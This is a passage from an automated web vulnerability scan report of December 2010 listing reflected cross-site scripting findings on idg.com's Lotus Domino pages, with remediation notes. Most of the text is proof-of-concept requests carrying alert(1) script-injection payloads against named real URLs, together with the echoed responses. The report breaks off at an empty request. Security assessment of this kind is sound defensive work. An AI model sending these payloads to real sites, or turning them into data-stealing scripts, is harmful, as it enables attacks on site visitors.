HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:36 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5031 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/ajaxroutine.js?efb80"-alert(1)-"77dede8c335=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72f0a"%3b5f984d36b94 was submitted in the REST URL parameter 1. This input was echoed as 72f0a";5f984d36b94 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www72f0a"%3b5f984d36b94/homenew.nsf/awmlib2.js HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:47 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5014 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www72f0a";5f984d36b94/homenew.nsf/awmlib2.js"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8105e"%3baf69c63e062 was submitted in the REST URL parameter 3. This input was echoed as 8105e";af69c63e062 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/awmlib2.js8105e"%3baf69c63e062 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:50 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5014 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/awmlib2.js8105e";af69c63e062"); } catch(err) {}</script> ...[SNIP]...
2.193. http://idg.com/www/homenew.nsf/awmlib2.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/awmlib2.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b033"-alert(1)-"ea5c4a653b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/awmlib2.js?1b033"-alert(1)-"ea5c4a653b=1 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:46 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5026 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/awmlib2.js?1b033"-alert(1)-"ea5c4a653b=1"); } catch(err) {}</script> ...[SNIP]...
The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7b2f"-alert(1)-"90698c058cf was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/core.js?OpenJavascriptLibrarye7b2f"-alert(1)-"90698c058cf HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:29 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5043 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/core.js?OpenJavascriptLibrarye7b2f"-alert(1)-"90698c058cf"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75c8e"%3b12e2645e466 was submitted in the REST URL parameter 1. This input was echoed as 75c8e";12e2645e466 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www75c8e"%3b12e2645e466/homenew.nsf/core.js?OpenJavascriptLibrary HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:29 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5033 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www75c8e";12e2645e466/homenew.nsf/core.js?OpenJavascriptLibrary"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6452c"%3b772900484ab was submitted in the REST URL parameter 3. This input was echoed as 6452c";772900484ab in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/core.js6452c"%3b772900484ab?OpenJavascriptLibrary HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:31 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5033 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/core.js6452c";772900484ab?OpenJavascriptLibrary"); } catch(err) {}</script> ...[SNIP]...
2.197. http://idg.com/www/homenew.nsf/core.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/core.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a779"-alert(1)-"d0b5380c266 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/core.js?3a779"-alert(1)-"d0b5380c266=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:37 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5024 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/core.js?3a779"-alert(1)-"d0b5380c266=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 848eb"%3b58421c6c63c was submitted in the REST URL parameter 1. This input was echoed as 848eb";58421c6c63c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www848eb"%3b58421c6c63c/homenew.nsf/home?readform HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:22 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5017 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www848eb";58421c6c63c/homenew.nsf/home?readform"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c700"%3b5ea31e5fe23 was submitted in the REST URL parameter 3. This input was echoed as 3c700";5ea31e5fe23 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/home3c700"%3b5ea31e5fe23?readform HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:22 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5017 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/home3c700";5ea31e5fe23?readform"); } catch(err) {}</script> ...[SNIP]...
2.200. http://idg.com/www/homenew.nsf/home [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc373"><script>alert(1)</script>63b78d5c0f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www/homenew.nsf/home?readform&cc373"><script>alert(1)</script>63b78d5c0f5=1 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 200 OK Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:21 GMT Last-Modified: Thu, 16 Dec 2010 13:00:19 GMT Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html Content-Length: 15450 Cache-control: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IDG.com: Home</titl ...[SNIP]... <input name="QUERY_STRING" id="QUERY_STRING" type="hidden" value="readform&cc373"><script>alert(1)</script>63b78d5c0f5=1"> ...[SNIP]...
2.201. http://idg.com/www/homenew.nsf/home [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7c1b"-alert(1)-"52c0a93e1d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/home?a7c1b"-alert(1)-"52c0a93e1d4=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:31 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5021 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/home?a7c1b"-alert(1)-"52c0a93e1d4=1"); } catch(err) {}</script> ...[SNIP]...
The value of the readform request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9917"-alert(1)-"f2355dde872 was submitted in the readform parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/home?readformc9917"-alert(1)-"f2355dde872 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:21 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5027 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/home?readformc9917"-alert(1)-"f2355dde872"); } catch(err) {}</script> ...[SNIP]...
The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 180d9"-alert(1)-"cdc8053a05f was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/menu.js?OpenJavascriptLibrary180d9"-alert(1)-"cdc8053a05f HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:46 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5043 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/menu.js?OpenJavascriptLibrary180d9"-alert(1)-"cdc8053a05f"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d44cf"%3bcaf6978cbc3 was submitted in the REST URL parameter 1. This input was echoed as d44cf";caf6978cbc3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwd44cf"%3bcaf6978cbc3/homenew.nsf/menu.js HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:38 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5011 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwd44cf";caf6978cbc3/homenew.nsf/menu.js"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebec9"%3beedfd5695ac was submitted in the REST URL parameter 3. This input was echoed as ebec9";eedfd5695ac in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/menu.jsebec9"%3beedfd5695ac HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:39 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5011 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/menu.jsebec9";eedfd5695ac"); } catch(err) {}</script> ...[SNIP]...
2.206. http://idg.com/www/homenew.nsf/menu.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/menu.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97eb7"-alert(1)-"93cd9db3b7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
